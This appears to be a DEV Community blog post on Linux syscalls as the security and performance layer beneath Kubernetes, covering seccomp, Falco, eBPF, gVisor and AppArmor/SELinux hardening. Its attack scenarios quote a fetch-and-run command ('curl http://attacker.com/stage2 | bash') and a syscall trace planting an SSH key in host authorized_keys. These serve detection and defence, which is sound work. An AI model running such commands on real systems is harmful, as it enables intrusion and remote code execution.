Piyush Jajoo

Posted on Mar 19

Syscalls in Kubernetes: The Invisible Layer That Runs Everything

#sre #infrastructure #linux #kubernetes

Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what's happening at this layer.

The Problem With "Containers Are Isolated"
What Is a Syscall, Really?
The io_uring Problem
The CPU Privilege Model
Anatomy of a Syscall
How Containers Change the Equation
The Kubernetes Security Stack — Layer by Layer
Real-World Scenarios
Performance Implications
What a Staff Engineer Should Own
Further Reading

The Problem With "Containers Are Isolated"

When engineers first learn Kubernetes, they're told: containers are namespaced processes. And that's mostly true — namespaces isolate PIDs, mount points, and network interfaces; cgroups constrain CPU and memory. The abstraction holds well enough.

Until it doesn't.

In 2019, CVE-2019-5736 exploited a file-descriptor mishandling bug in runc: a container process running as root could open /proc/self/exe, which transparently resolves to the host's runc binary via procfs semantics — bypassing normal symlink sandboxing. The container could overwrite the runc binary mid-execution and gain host root.
In 2022, CVE-2022-0492 found a missing capability check in the kernel's cgroup_release_agent_write function — a container without CAP_SYS_ADMIN in the host namespace could create a new user namespace via unshare, mount cgroupfs inside it, and write an arbitrary path to release_agent. When the cgroup emptied, the kernel executed that path as root on the host.

Both exploits were entirely syscall-driven — no memory corruption required. Crucially, both were blocked by the Docker default seccomp profile and AppArmor — which is precisely why those defaults exist, and why disabling them on production workloads is so dangerous.

The root cause in every container escape: containers share the host kernel. And the kernel is reached exclusively through syscalls.

If you're a platform or infrastructure engineer running multi-tenant Kubernetes, this isn't a security team problem. It's your problem. And it starts with understanding syscalls.

What Is a Syscall, Really?

Your application — whether it's written in Go, Python, Java, or Rust — runs in user space. It has no direct access to hardware, the filesystem, or the network. It cannot allocate physical memory. It cannot open a socket.

To do any of these things, it must ask the kernel — and the only mechanism to do that is a system call (syscall).

Think of it like this: your application is a tenant in an apartment building. The kernel is the building manager who controls access to electricity, water, and the internet. The syscall is the intercom — the only way to request something from the manager.

Linux exposes roughly 450 syscalls on x86-64 as of modern 6.x kernels (kernel 5.4 had ~435; kernel 6.1 reached ~450; 6.8+ ~460). The count grows with each release as new interfaces like io_uring and landlock are added. The most commonly used in a typical web application: read, write, open, close, socket, connect, mmap, clone, execve, exit. A typical containerized service uses fewer than 50 distinct syscalls in steady state.

This matters enormously — because the ones you don't need are your attack surface.

The `io_uring` Problem

Before getting into privilege rings and syscall mechanics, it's worth calling out the most significant shift in the Linux syscall surface of the past few years: io_uring.

Introduced in Linux 5.1 (2019), io_uring is an asynchronous I/O interface built around two ring buffers shared between user space and the kernel. The design goal was to eliminate the per-operation syscall overhead that makes high-throughput I/O expensive under KPTI(Kernel Page-Table Isolation). Instead of calling read() or write() per operation, applications submit batches of I/O requests by writing into the submission queue (SQ ring) and poll the completion queue (CQ ring) for results — all without a syscall per operation.

The performance gains are real — io_uring can drive storage and network I/O at significantly higher throughput than traditional syscall-per-operation patterns. But it introduced a massive new kernel attack surface.

The Security Problem

io_uring operations execute in the kernel with elevated context. Because the interface is complex, stateful, and relatively new, it has been a prolific source of privilege escalation vulnerabilities:

CVE	Year	Impact
CVE-2021-41073	2021	Type confusion in `io_uring` leading to privilege escalation
CVE-2022-29582	2022	Use-after-free in `io_uring` — container escape
CVE-2023-2598	2023	Heap out-of-bounds write via `io_uring` fixed buffers

Each of these was reachable from an unprivileged container process. Because io_uring isn't a single syscall but a kernel subsystem accessed via three syscalls (io_uring_setup, io_uring_enter, io_uring_register), the standard seccomp RuntimeDefault profile does not block it — it was introduced after the default profiles were designed.

What To Do

Many hardened environments explicitly block io_uring at the seccomp level:

{
  "syscalls": [
    {
      "names": ["io_uring_setup", "io_uring_enter", "io_uring_register"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}

Google's own gVisor disables io_uring by default. The Kubernetes v1.33 audit trail and several CIS benchmarks now explicitly recommend blocking io_uring for workloads that don't require it.

The staff-level takeaway: every time the kernel adds a new high-performance I/O interface, it adds a new attack surface that existing seccomp profiles don't cover. io_uring is the canonical example. Your seccomp profile graduation pipeline must account for new kernel subsystems, not just new individual syscalls.

The CPU Privilege Model

To understand why syscalls exist, you need to understand how CPUs enforce privilege boundaries.

Modern x86-64 processors have four privilege rings:

Linux only uses Ring 0 (kernel) and Ring 3 (user). When your application executes the syscall instruction, the CPU immediately:

Saves the current register state
Switches to kernel mode (Ring 0)
Jumps to the kernel's syscall handler
Executes the requested operation
Restores registers and returns to Ring 3

This mode switch is the only sanctioned transition. Without it, user-space code cannot touch kernel data structures, physical memory, or hardware. It's a hardware-enforced boundary — not a software convention.

The critical insight for container security: this boundary is per-kernel, not per-container. When two containers run on the same node, they use the same syscall gateway into the same kernel. A syscall that bypasses a kernel check escapes both containers simultaneously.

Anatomy of a Syscall

Let's trace a concrete example. Suppose a Go HTTP server accepts a connection and reads the request body.

What looks like a single conn.Read() call results in:

One or more read(2) syscalls on the socket file descriptor
The kernel checking the process's permissions, the socket state, and available data
A DMA transfer from the NIC's ring buffer into kernel memory, then copied to user space

Every one of those kernel checks is a potential security enforcement point — and every kernel bug in that path is a potential vulnerability reachable from your container.

How Containers Change the Equation

A VM gives each workload its own kernel. A container does not.

Containers get:

PID namespace — isolated process tree
Network namespace — isolated network stack
Mount namespace — isolated filesystem view
cgroups — CPU/memory resource limits

Containers do not get:

Their own kernel
Their own syscall table
Kernel memory isolation

This does not mean containers have zero isolation. Multiple mechanisms reduce the blast radius of a kernel compromise:

Namespaces — restrict what a container can see (PIDs, mounts, network)
cgroups — bound resource consumption
Linux Capabilities — limit the privilege set a container process holds
seccomp — restrict which syscalls can be made at all
LSMs (AppArmor/SELinux) — enforce mandatory access controls even on permitted syscalls

These work as defence-in-depth layers, not as kernel isolation equivalents. A VM still provides a fundamentally stronger boundary because kernel bugs in one tenant cannot affect another tenant's kernel. But a well-configured container is far harder to escape than a bare process.

This means if Container A can trigger a kernel bug via a syscall — say, a privilege escalation in clone() or a heap overflow in io_uring — it affects the host and every other container on that node.

Real scenario: In 2022, CVE-2022-0492 found a missing capability check in the kernel's cgroup_release_agent_write function. The kernel failed to verify that the calling process held CAP_SYS_ADMIN in the initial user namespace. A container process could call unshare() to create a new user namespace and cgroup namespace, mount cgroupfs inside it, then write an arbitrary host binary path to release_agent — all without elevated host privileges. When the cgroup became empty, the kernel executed that binary as root on the host. Zero memory corruption: just unshare(), mount(), and write() syscalls in the right sequence. Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable — those layers blocked the required mount() and unshare() calls. Only permissive configurations (no seccomp, no MAC) were at risk.

The Kubernetes Security Stack — Layer by Layer

Given that containers share a kernel, how do you defend the syscall boundary? There are five complementary mechanisms — each operating at a different point in the syscall path:

seccomp: Your Syscall Firewall

seccomp (Secure Computing Mode) is a Linux kernel feature that lets you attach a BPF filter to a process. The filter is evaluated on every syscall before the kernel executes it. When a syscall is not allowed, the filter's configured action determines the outcome — it is not always a simple EPERM:

seccomp Action	Behaviour
`SCMP_ACT_ALLOW`	Syscall proceeds normally
`SCMP_ACT_ERRNO`	Returns an error code (e.g. `EPERM`) — the default for RuntimeDefault
`SCMP_ACT_KILL_PROCESS`	Immediately kills the process — used for highest-risk syscalls
`SCMP_ACT_LOG`	Logs the syscall, allows it — useful for audit-mode profiling
`SCMP_ACT_TRACE`	Notifies a `ptrace` tracer — used for policy development tooling
`SCMP_ACT_NOTIFY`	Sends the event to a user-space supervisor via fd — enables policy agents

The Kubernetes RuntimeDefault profile uses SCMP_ACT_ERRNO for disallowed syscalls. Custom profiles can mix actions — kill on ptrace, log on unknown syscalls during a grace period, and allow everything else.

Analogy: seccomp is a bouncer at the kernel's door. Your app can only get in if the syscall is on the guest list.

Kubernetes exposes this via seccompProfile:

apiVersion: v1
kind: Pod
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault   # containerd/docker's default profile
  containers:
  - name: api-server
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false

The RuntimeDefault profile blocks ~44 high-risk syscalls including:

Syscall	Why it's dangerous
`ptrace`	Allows one process to inspect/modify another's memory. Classic injection vector.
`clone` (namespace-creating flags only)	The profile blocks `CLONE_NEWUSER` and `CLONE_NEWNS` flag combinations — not `clone` itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector.
`syslog`	Reads kernel message buffer. Information disclosure.
`perf_event_open`	Side-channel attack surface (Spectre-class).
`keyctl`	Access to kernel keyring. Credential theft.
`bpf`	Load eBPF programs. Privilege escalation surface.

For high-security workloads, RuntimeDefault isn't enough. You want a custom profile scoped to what your specific workload actually calls. Here's the workflow:

Production tip: Start with RuntimeDefault, instrument with Falco to catch EPERM signals, then tighten to a custom profile over one or two release cycles. Don't try to go from zero to custom profile in one shot — you'll break things.

Falco: Syscall-Level Runtime Detection

Falco (CNCF project) hooks into the kernel's syscall stream — via a kernel module or an eBPF probe — and evaluates every syscall event against a rule engine in user space.

Falco rules are expressive and context-aware:

- rule: Shell Spawned in Container
  desc: A shell was spawned in a container that should not run shells
  condition: >
    spawned_process and
    container and
    shell_procs and
    not proc.pname in (allowed_parents)
  output: >
    Shell spawned in container
    (pod=%k8s.pod.name ns=%k8s.ns.name
     cmd=%proc.cmdline parent=%proc.pname
     image=%container.image.repository)
  priority: CRITICAL

Why Falco catches what application-level monitoring misses:

All behavior — no matter how sophisticated — eventually becomes syscalls. An attacker who compromises your app and tries to:

Read /etc/shadow → openat() syscall → Falco sees it
Exfiltrate data via DNS → socket() + connect() → Falco sees it
Escalate privileges → setuid() / clone() → Falco sees it
Download a second-stage payload → execve("curl", ...) → Falco sees it

No agent in your application code. No SDK to integrate. Pure kernel-level observation.

Staff-level consideration: Falco's event throughput on a busy node can be high — 100k+ syscall events/sec on a heavily loaded API server node. You need to think about the Falco deployment model (DaemonSet with kernel module vs. eBPF probe), rule cardinality, and alert fatigue suppression from the start. Falco's modern eBPF probe requires kernel ≥5.8 (for BPF ring buffer and BTF/CO-RE support) and has been the default driver since Falco 0.38.0 — it is bundled directly in the Falco binary, requiring no separate kernel module compilation. In Falco 0.43.0, the legacy eBPF probe (engine.kind=ebpf) was deprecated (not the kernel module — kmod remains supported for older kernels). The driver decision tree in production: kernel ≥5.8 → modern eBPF (default, zero driver download); kernel <5.8 → kernel module (kmod), which requires matching kernel headers and breaks on kernel upgrades.

eBPF: Programmable Kernel Hooks

eBPF (extended Berkeley Packet Filter) is one of the most significant additions to the Linux kernel in the last decade. It lets you load sandboxed programs into the kernel that execute at specific hook points — including syscall entry and exit — without modifying kernel source or loading full kernel modules.

The verifier is the key safety property: before any eBPF program executes in the kernel, the verifier statically proves it terminates, doesn't access invalid memory, and can't crash the kernel. This gives you programmable kernel instrumentation without the risk of a buggy kernel module taking down the node.

How Kubernetes tooling uses eBPF:

Tool	eBPF Hook	What it achieves
Cilium	`tc`, `xdp`, socket hooks	L3/L4/L7 network policy without iptables
Tetragon	`kprobe`, `tracepoint`	Enforce policy at kernel function level (not just syscall boundary)
Pixie	`uprobe` + syscall hooks	Capture HTTP headers, SQL queries, gRPC frames without app changes
Parca	`perf_event`	Continuous CPU profiling with stack traces
Falco	Tracepoint / raw syscall	Runtime security event stream

Staff-level insight: The shift from iptables/ipvs to eBPF-based networking (Cilium) is not just a performance improvement. It's a security architecture change. With iptables, policy is evaluated at netfilter hooks — after the syscall has returned and the packet is already in the kernel's network stack. With eBPF XDP(eXpress Data Path), you can drop packets before they even DMA(Direct Memory Access) into kernel memory. The enforcement point moves earlier in the execution path.

XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack.
DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention.

gVisor: The User-Space Kernel

gVisor takes a fundamentally different approach: instead of filtering which syscalls your container can make, it intercepts all syscalls and handles them in a user-space kernel called the Sentry.

The Sentry is written in Go and implements the Linux syscall ABI(Application Binary Interface). When your container app calls open(), the Sentry handles it — checking permissions, managing file descriptors — using only a narrow set of host syscalls to do so. The host kernel's attack surface shrinks from ~450 syscalls to a few dozen host syscalls. Per gVisor's own security documentation, this is in the range of 53–68 depending on whether networking (Netstack) is enabled — but this figure varies by platform and gVisor version. The key invariant: no syscall is ever passed through directly. Each one has an independent implementation inside the Sentry, so even if the Sentry's syscall handling has a bug, the host kernel's full attack surface is never exposed.

Where this is deployed: Google Cloud Run and GKE Sandbox use gVisor. If you run untrusted code (user-submitted functions, multi-tenant FaaS), gVisor is the right choice. For trusted first-party workloads, the overhead (10-15% latency increase on I/O-heavy workloads) may not be justified.

The tradeoff is explicit:

Attack surface reduction = performance cost
More isolation           = more overhead

seccomp + eBPF gets you 80% of the protection at ~1% overhead. gVisor gets you 99% protection at 10-15% overhead. Choose based on your threat model.

LSMs: Mandatory Access Controls

seccomp decides which syscalls a process can make. Linux Security Modules (LSMs) decide what those syscalls can do — even after they've been permitted.

The distinction matters. A container's seccomp profile might allow openat() (it's fundamental to almost every workload). An LSM then enforces which paths that openat() can access. The syscall passes seccomp; the kernel's LSM hook fires before the file is opened; access is denied.

Three LSMs are relevant in Kubernetes:

LSM	Mechanism	Kubernetes Usage
AppArmor	Path-based profiles — restrict file access, network, capabilities per process	Default on Ubuntu/Debian nodes; containerd applies profiles per container
SELinux	Label-based mandatory access control — every process and file has a security context	Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods
Landlock	Unprivileged sandboxing — processes can voluntarily restrict their own file access	Emerging; available since kernel 5.13; useful for defence-in-depth in application code

Why this matters for CVE-2022-0492: That exploit required unshare() and mount() syscalls. seccomp's RuntimeDefault profile blocked them. But if you'd been running without seccomp, AppArmor's default container profile would have independently denied the mount operation. This is defence-in-depth working as intended — two independent layers, either of which alone would have stopped the exploit.

Staff-level note: AppArmor and SELinux profiles are often set to Unconfined in practice because they're hard to operationalise at scale. This is the real risk — not that the tools don't work, but that they're disabled. A platform team should treat LSM profile coverage as a first-class metric alongside seccomp adoption.

Real-World Scenarios

Scenario 1: The Cryptominer Escape

What happened: An attacker compromised a poorly-configured Redis instance in a container (no auth, exposed port). They:

Used Redis's CONFIG SET dir and CONFIG SET dbfilename to write an SSH public key to /root/.ssh/authorized_keys on the host — possible because the container ran as root and the host /root was mounted in.
SSHd into the host directly.

Syscall trace of the attack:

openat(AT_FDCWD, "/mnt/host-root/.ssh/authorized_keys", O_WRONLY|O_CREAT)
write(fd, "ssh-rsa AAAA...", ...)

What would have caught it:

seccomp: A custom profile would not have blocked openat (it's fundamental), but mounting host paths is a Kubernetes admission controller concern.
Falco rule: openat to a path outside the container's expected directories → alert.
Root cause fix: Don't run containers as root. Use runAsNonRoot: true. Don't mount host paths.

Scenario 2: The Lateral Movement via `execve`

What happened: An attacker found an RCE in a Java app. The exploit triggered Runtime.exec("curl http://attacker.com/stage2 | bash").

Syscall sequence:

clone()         → fork a child process
execve("bash")  → replace child with bash
execve("curl")  → curl downloads payload
execve("bash")  → execute payload

What Falco catches immediately:

A Java process (java) spawning bash → anomalous parent-child relationship
curl executing from within a container that has no business running curl
execve of any shell from a non-shell expected workload

What seccomp can do: If your Java service has a custom seccomp profile that doesn't include execve at all (many services never need to fork/exec), the clone() + execve() chain is blocked before it starts.

Scenario 3: eBPF-Based Zero-Trust Networking

Setup: You're migrating from an iptables-based CNI to Cilium. The goal is L7-aware network policy.

Without eBPF, enforcing "Pod A can call /api/users on Pod B but not /api/admin" requires an L7 proxy sidecar (Istio/Envoy). Every request goes:

App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App

That's four kernel crossings per request.

With Cilium's eBPF-based L7 policy:

App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App

Two kernel crossings for L3/L4 policy. For L7 (HTTP method/path inspection), Cilium uses a per-node Envoy proxy — not a per-pod sidecar — which is redirected to via eBPF socket hooks. This eliminates the per-pod sidecar overhead while still enabling L7 enforcement. The key distinction: L3/L4 enforcement is entirely in eBPF (zero user-space hops); L7 enforcement redirects through a shared node-level proxy rather than duplicating a proxy instance per pod.

The syscall angle: eBPF programs attach to sock_ops and sk_msg hooks — fired at socket-level syscall boundaries. Before a TCP connection is fully established or a stream is forwarded, the eBPF program has already made the L3/L4 allow/deny decision, with L7 decisions delegated to the node Envoy.

Performance Implications

Every syscall has a cost. The mode switch from Ring 3 (user mode) to Ring 0 (kernel mode) takes 100–300 nanoseconds on modern hardware — negligible per call, but significant at scale. Two factors in Kubernetes amplify this cost beyond the baseline.

The two biggest syscall performance concerns in Kubernetes:

1. Meltdown / KPTI Mitigations

In January 2018, researchers disclosed Meltdown (CVE-2017-5754), a CPU vulnerability that allowed user-space code to read arbitrary kernel memory by exploiting speculative execution — a CPU optimization where the processor runs instructions ahead of time before determining if they should actually execute. An attacker could use this to read secrets (keys, passwords, tokens) that the kernel had in memory from other processes, all without elevated privileges.

The fix was KPTI (Kernel Page Table Isolation), shipped in Linux 4.15+ and backported to LTS kernels. The idea: keep two completely separate page tables — one for user space (which has no mappings to kernel memory), and one for kernel space (which has full mappings). Before KPTI, both user and kernel code shared a single page table with kernel memory mapped but protected. With KPTI, kernel memory is invisible to user space entirely; there's nothing to speculatively leak.

Note: KPTI does not address Spectre (CVE-2017-5753, CVE-2017-5715), a related but distinct speculative execution vulnerability. Spectre mitigations — Retpoline (a compiler technique to prevent speculative indirect branch prediction), IBRS (microcode that restricts cross-privilege speculative execution), and IBPB (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive.

How KPTI makes syscalls more expensive:

On every user↔kernel transition, the CPU must switch between the two separate page table sets. This is done via the CR3 register — the control register that points to the currently active page table. A CR3 write forces the CPU to start using a different page table, which inherently invalidates the TLB (Translation Lookaside Buffer) — the CPU's cache of recent virtual-to-physical address translations. A cold TLB means the next memory accesses require expensive page table walks instead of cache hits.

Modern Intel/AMD CPUs support PCID (Process Context Identifiers), a hardware feature that tags TLB entries with a context ID so the CPU can maintain TLB entries for multiple address spaces simultaneously. With PCID, a CR3 switch doesn't require flushing the entire TLB — the CPU simply activates a different set of tagged entries. This significantly reduces KPTI's overhead, but the CR3 switch itself still has a cost.

Real-world overhead on PCID-enabled modern CPUs:

Workload type	KPTI overhead
Typical Kubernetes API server / web services	2–10%
Syscall-heavy services (high-RPS Redis, dense I/O pipelines)	20–30%
Pathological microbenchmarks (>1M syscalls/sec/CPU)	Up to 800%*

Brendan Gregg, Netflix — a lab scenario, not a production baseline. For most Kubernetes workloads, **5–10% is a realistic planning budget*.

This is the architectural reason io_uring was designed the way it was (see The io_uring Problem): by sharing ring buffers between user space and kernel space, applications can submit and complete many I/O operations without a syscall per operation, amortizing KPTI overhead across batches.

2. Syscall Frequency vs. Batching

Beyond KPTI, the raw number of syscalls a service issues matters independently. The Ring 3→Ring 0→Ring 3 round-trip is not just a page-table cost — it also involves register saves/restores, privilege checks, and kernel stack setup. These are fixed costs per syscall, regardless of how much work is done inside.

A service making 100,000 small write() calls is slower than one making 10,000 write() calls with 10x larger buffers, even if total bytes are identical. This is why Go's bufio.Writer, Java's BufferedWriter, and virtually all I/O abstractions exist — they buffer writes in user space and flush in larger chunks, reducing syscall frequency. The actual data movement is the same; the kernel crossing overhead is not.

The Kubernetes-specific manifestation: services with high syscall frequency per RPS are more sensitive to noisy neighbors — other workloads on the same node that drive up syscall contention. A cryptominer running mmap in a tight loop on the same physical node will degrade your API latency through two mechanisms:

Syscall contention — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks.
Cache pollution — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU's L1/L2 instruction and data caches, degrading cache hit rates for your workload's subsequent kernel entries.

This happens even if cgroups are correctly configured for CPU and memory — cgroups do not limit syscall rate or kernel cache footprint.

Falco and eBPF-based profiling tools like Parca can surface these patterns before they become incidents. Parca attaches to perf_event hooks to capture continuous CPU flame graphs — if you see kernel time unexpectedly high in your service's profile during a noisy-neighbor incident, syscall pressure is the first thing to investigate.

What a Staff Engineer Should Own

Understanding syscalls isn't just trivia — it maps directly to ownership responsibilities at the platform level.

Concrete deliverables a staff engineer should drive:

Syscall baseline per workload class — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds.
seccomp profile graduation pipeline — automate the path from RuntimeDefault → custom profile. Record in staging, diff against baseline, promote on green CI.
Falco rule library with suppression logic — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives.
Kernel upgrade policy — every kernel version changes the syscall landscape (new io_uring operations, new bpf commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout.
Threat model documentation — explicitly document your isolation assumptions. If you're running RuntimeDefault seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles.
Syscall drift detection — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling io_uring_setup or getrandom. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like inspektor-gadget and Falco's audit mode can instrument this automatically.

DEV Community

Syscalls in Kubernetes: The Invisible Layer That Runs Everything

Table of Contents

The Problem With "Containers Are Isolated"

What Is a Syscall, Really?

The `io_uring` Problem

The Security Problem

What To Do

The CPU Privilege Model

Anatomy of a Syscall

How Containers Change the Equation

The Kubernetes Security Stack — Layer by Layer

seccomp: Your Syscall Firewall

Falco: Syscall-Level Runtime Detection

eBPF: Programmable Kernel Hooks

gVisor: The User-Space Kernel

LSMs: Mandatory Access Controls

Real-World Scenarios

Scenario 1: The Cryptominer Escape

Scenario 2: The Lateral Movement via `execve`

Scenario 3: eBPF-Based Zero-Trust Networking

Performance Implications

1. Meltdown / KPTI Mitigations

2. Syscall Frequency vs. Batching

What a Staff Engineer Should Own

Further Reading

Top comments (0)

Table of Contents

The Problem With "Containers Are Isolated"

What Is a Syscall, Really?

The io_uring Problem

The Security Problem

What To Do

The CPU Privilege Model

Anatomy of a Syscall

How Containers Change the Equation

The Kubernetes Security Stack — Layer by Layer

seccomp: Your Syscall Firewall

Falco: Syscall-Level Runtime Detection

eBPF: Programmable Kernel Hooks

gVisor: The User-Space Kernel

LSMs: Mandatory Access Controls

Real-World Scenarios

Scenario 1: The Cryptominer Escape

Scenario 2: The Lateral Movement via execve

Scenario 3: eBPF-Based Zero-Trust Networking

Performance Implications

1. Meltdown / KPTI Mitigations

2. Syscall Frequency vs. Batching

What a Staff Engineer Should Own

Further Reading

The `io_uring` Problem

Scenario 2: The Lateral Movement via `execve`